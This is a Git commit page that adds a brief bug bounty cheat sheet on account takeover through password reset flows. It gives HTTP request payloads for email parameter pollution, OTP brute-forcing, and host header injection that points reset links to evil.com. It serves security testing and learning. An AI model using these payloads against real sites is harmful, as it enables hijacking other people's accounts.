ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Account Takover [1]

Browse Source 
Create account takeover tips, and add 3 tips
This commit is contained in:
Muhammad Daffa 2020-09-03 20:52:49 +07:00 committed by GitHub
parent 1222314a08
commit 4e7af26eb2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
AccountTakeover.md Normal file
View File

@ -0,0 +1,24 @@
## Account Takeover
1. Parameter pollution in reset password
```
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
```
2. Bruteforce the OTP code
```
POST /reset
[...]
email=victim@mail.com&code=$123456$
```
3. Host header Injection
```
POST /reset
Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with your evil.com